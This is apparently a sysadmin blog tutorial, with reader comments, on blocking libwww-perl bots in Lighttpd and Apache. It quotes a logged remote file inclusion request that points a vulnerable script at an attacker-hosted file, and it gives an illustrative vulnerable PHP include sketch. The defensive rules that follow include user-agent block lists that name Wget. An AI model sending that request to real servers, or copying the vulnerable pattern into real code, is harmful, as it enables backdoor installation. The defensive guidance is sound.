The rise of bots, spammers, crack attacks and libwww-perl

libwww-perl (LWP) is a fine WWW client/server library for Perl. Unfortunately, this library is used by many script kiddies, crackers, and spam bots.


Verifying bot activity in your logs

The following is a typical example you will find in your Apache or Lighttpd access.log file:

$ grep 'libwww-perl' access.log

OR

$ grep 'libwww-perl' /var/log/lighttpd/access.log

Output:

62.152.64.210 www.domain.com - [23/Oct/2006:22:24:37 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.someattackersite.com/list.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"

So someone is trying to attack your host and plant a backdoor. yesno.phtml is a poorly written application that can run or include PHP code (list.txt) from a remote server. This code installs a Perl-based backdoor in /tmp or /dev/shm and notifies an IRC server or the bot master that the server is ready to attack other computers. The backdoor can then flood or DDoS other victims' servers (which will also cost you tons of bandwidth). Usually the attacker hides behind zombie machines. Blocking by user agent can help, and in some cases the problem can be dropped altogether.
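The underlying flaw is a classic remote file inclusion. The actual yesno.phtml source is not shown here, so the following is only a hypothetical sketch of the vulnerable pattern (it assumes PHP with allow_url_include enabled):

<?php
// VULNERABLE (illustrative only): this includes whatever URL the client
// passes in ?no_url=, so an attacker can supply
// http://www.someattackersite.com/list.txt and have it executed as PHP.
include($_GET['no_url']);
?>

The fix is never to pass user input to include(); map the parameter to a whitelist of local files instead.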

You will also notice libwww-perl/5.76 as the browser name (i.e., the user agent). To avoid such attacks:
=> Block all libwww-perl user agents
=> Run the web server in a chrooted jail

How to block libwww-perl under Lighttpd web server?

Open lighttpd.conf file:
# vi /etc/lighttpd/lighttpd.conf
Append the following lines to the main server or virtual hosting section:
$HTTP["useragent"] =~ "libwww-perl" {
url.access-deny = ( "" )
}
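If you want to catch other abusive clients with the same rule, you can extend the regex. A sketch (the extra agent names are illustrative; make sure you do not block tools you actually rely on):

$HTTP["useragent"] =~ "(libwww-perl|EmailSiphon|EmailWolf)" {
url.access-deny = ( "" )
}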

Save and close the file. Restart lighttpd:
# /etc/init.d/lighttpd restart

How to block libwww-perl under Apache web server?

Use mod_setenvif and a .htaccess file to block the libwww-perl user agent. Open your .htaccess file and add the following rules:
SetEnvIfNoCase User-Agent "^libwww-perl" block_bad_bots
Deny from env=block_bad_bots
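On Apache 2.2 it is safer to spell out the full access-control block. A sketch, assuming mod_setenvif and mod_authz_host are enabled (on Apache 2.4 you would use the newer Require syntax instead):

SetEnvIfNoCase User-Agent "libwww-perl" block_bad_bots
Order Allow,Deny
Allow from all
Deny from env=block_bad_bots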

How do I verify that User-Agent libwww-perl is blocked?

Test from your own workstation with a small Perl LWP script. Replace http://your-website.com/ with your site name in the request line:
$req = HTTP::Request->new(GET => 'http://your-website.com/');
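The original download link is not reproduced here, so below is a minimal test-lwp.pl sketch built around that request line (it assumes libwww-perl is installed and sends LWP's default user agent):

#!/usr/bin/perl
# test-lwp.pl - fetch a page with LWP's default user agent
# ("libwww-perl/x.xx") to check whether the server blocks it.
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

my $ua  = LWP::UserAgent->new;
my $req = HTTP::Request->new( GET => 'http://your-website.com/' );
my $res = $ua->request($req);

if ( $res->is_success ) {
    print $res->decoded_content;              # not blocked: page was served
} else {
    print 'Error: ', $res->status_line, "\n"; # expect "Error: 403 Forbidden"
}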
Save and execute the Perl script:
$ chmod +x test-lwp.pl
$ ./test-lwp.pl

Output:

Error: 403 Forbidden

You should see a 403 Forbidden error, as your user agent is blocked by the server configuration.
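To confirm that only the agent string is being matched (and regular visitors are unaffected), repeat the request with a spoofed agent. A sketch reusing the same script (the agent string is arbitrary):

my $ua  = LWP::UserAgent->new( agent => 'Mozilla/5.0 (test)' ); # spoofed agent
my $res = $ua->get('http://your-website.com/');
print $res->status_line, "\n";                                  # should now print "200 OK"

If the spoofed request returns 200 while the default agent gets 403, the rule matches only the agent string, as intended.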

Please note that blocking by user agent can help, but spammers spoof user agents. My personal experience shows that blocking libwww-perl saves bandwidth and drops potential threats by 50-80%.

Another highly recommended solution is to run the web server in a chrooted jail. In a chrooted jail the attacker cannot install a backdoor, as a shell and utilities such as wget are not available to download the Perl code. I also recommend blocking all outgoing HTTP/FTP requests from your web server using iptables, or using a hardware-based firewall such as a Cisco ASA.
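For example, a minimal iptables sketch (it assumes the web server runs as the www-data user; substitute apache or lighttpd as appropriate for your distribution):

# Reject outgoing HTTP and FTP connections initiated by the web server user,
# so a planted script cannot fetch its payload or phone home on those ports.
iptables -A OUTPUT -m owner --uid-owner www-data -p tcp --dport 80 -j REJECT
iptables -A OUTPUT -m owner --uid-owner www-data -p tcp --dport 21 -j REJECT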

A final, extreme solution is to put the entire root file system on read-only media such as a CD-ROM (or use a live CD). No attacker can bring down your web server if it is serving pages from read-only media (short of a DoS/DDoS attack).

What do you think? How do you block such attacks? Please share your nifty technique with us.


29 comments
  • Randal L. Schwartz Nov 4, 2006 @ 14:32

    Blocking LWP::UserAgent by agent name is like painting a lock on your door and saying it’s secure. Dumb. Really dumb. Not worth the time, and surprised you suggested it.

    • Jesus of Anonymous Jun 15, 2011 @ 22:39

Personally, I would have a little fun with the script kiddies, seeing as they mostly use automatic scripts they downloaded from IRC. Simply redirect the attack path you can see in your logs (you will know what they are looking for) over to the FBI. You can bet they will soon stop attacking your site for fear of being traced. No one wants the FBI to track and jail them. If they are stupid enough to run an auto attack bot, then it will be the FBI site that gets the attack vector, not you, and the FBI will trace your hacker. Simple, lol.

      • ElSecurityGURU Sep 2, 2011 @ 7:40

That is funny and probably a good way to stop them, lol. El kudos.

  • 🐧 nixCraft Nov 4, 2006 @ 16:00

    Randal,

Blocking by user agent can help, but spammers spoof user agents. It's just a suggested solution; there are tons of dumb spammers too who don't change their user agent, so I do block them 🙂

The real solution is a chrooted jail.

    Appreciate your post.

  • DarkMindZ Apr 29, 2008 @ 18:04

Good one. I wrote a similar, easier technique here:

    Blocking bots and scanners with htaccess

  • mumuri May 21, 2008 @ 19:20

There is another solution: if this software follows every link on a page, you can just put an invisible link on the page, and when that link is requested, you ban the bot's IP.

  • Terrorkarotte Mar 4, 2009 @ 10:03

Thanks for the tutorial. After I made the changes, the kids changed their identification and now they can try their attacks like before.
While analysing what kind of code injection attempt they tried this time, I found this page: http://www.crawltrack.net/
It is a PHP application with MySQL support that allows me to redirect and block the script kiddies when they attempt an injection. The script does not look at the user agent but at the injections themselves. Maybe this script is worth a try for you too.

  • Lawrence Apr 9, 2009 @ 18:02

3 years on since you wrote this, and it's still a good suggestion.

Randal Schwartz might be Mr Perl, but blocking libwww-perl has worked wonders for me in reducing unnecessary bandwidth from bots.

Checking my logs, I have zero legitimate user agents using libwww-perl, and *100%* of hacker attempts using it (or other such user agents). That's good enough for me to block that agent.

    I’m doing it in apache2.conf as follows:

    SetEnvIfNoCase User-Agent "^Wget" bad_bot
    SetEnvIfNoCase User-Agent "^EmailSiphon" bad_bot
    SetEnvIfNoCase User-Agent "^EmailWolf" bad_bot
    SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot
    
    
<Directory />
    Order allow,deny
    Allow from all
    Deny from env=bad_bot
</Directory>
    
    
  • Bruno Jun 2, 2009 @ 7:16

    Hi.
I tried to use your tutorial today (using a .htaccess file) but it didn't work.
Then I replaced the first line with:
SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots
and it's now working.
Hope it can help you improve this great tip.

  • About Web Jul 13, 2011 @ 7:26

Thanks Vivek, finally got this working solution to block libwww-perl bot access.

  • techno Feb 22, 2012 @ 15:00

Thanks Vivek, this article was helpful for me.

  • MetaTrader 4 MQL Services Apr 11, 2012 @ 23:53

    Thank you very much!

We had quite a lot of bandwidth stolen due to this annoying Perl bot.

Thanks to you, we have now blocked it in the .htaccess.

    Keep up the good work!

  • Sam May 8, 2012 @ 6:56

Sometimes it's all quite confusing… especially for newbies…

  • Abhimanyu Jun 12, 2012 @ 11:47

    Hi Website Owner,

I have a website built as a Web 2.0 application, so please give me some ideas on how to block spammers via .htaccess or libwww-perl access. I have already tried all of the code above; please help me. Right now I just block the IPs one by one, and every day I find many more spammer IPs.

Hope you will consider my request and respond soon.

    Regards
    Abhimanyu

  • Poceni letalske karte Aug 25, 2012 @ 19:02

    Thank you for this useful tip. It has been handy for me.
    Kind regards!

  • poptropica Aug 30, 2012 @ 16:20

Also try the below and place it in your .htaccess file.

RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)=http [NC]
RewriteRule ^(.*)$ - [F,L]

  • Paul Goh Oct 3, 2012 @ 11:56

How do I put the code in the .htaccess file?

  • kudos May 1, 2013 @ 10:48

Thanks for your tutorial. However, it's not working for me. I inserted the rules in my .htaccess.
I then used your Perl script and changed the domain to mine. I'm not familiar with Perl at all, but I'm using the Padre editor and simply clicked the run script button.
The server did not block me; instead I got to see the HTML of my website.

Any ideas?

    Any ideas?

  • آموزش سئو Nov 9, 2013 @ 4:52

Thank you for the .htaccess code.

  • Michael Fever Mar 8, 2014 @ 1:35

    The script blocks the user agent string which is sent by the browser. It’s not something you can easily replicate.

  • Steve Rogers Mar 18, 2014 @ 16:03

    Thank you very much for the tips! I saved a lot of bandwidth from these bots. By the way, will this affect my SEO ranking in any way?

  • johnny Jun 16, 2014 @ 18:42

Can someone explain to me how to block libwww-perl on Blogspot?
When I check my blog, libwww-perl is on it…

  • Mayyank Gupta Dec 29, 2014 @ 7:07

Johnny, use this code:
RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
RewriteRule .* - [F,L]

  • Johnny Evans Feb 20, 2015 @ 12:43

    What about blocking it on IIS web servers?

    Thanks

  • Gaurav dutt Mar 29, 2015 @ 17:51

How do I block this libwww-perl.8 in Blogger?

  • آپلود عکس Sep 15, 2015 @ 8:34

I set this code in .htaccess but it is not working.

  • al3abmizo Jan 20, 2016 @ 21:13

    Thanks for the great info 🙂

  • Yiannis Apr 19, 2017 @ 10:02

Years back, but still working… Thanks!
Just be careful when inserting the code. Make the change as suggested in the comments:

SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots

  • raja May 13, 2017 @ 1:24

We have tried all the options but nothing works. Can someone please help me solve this problem in our ASP.NET web application?
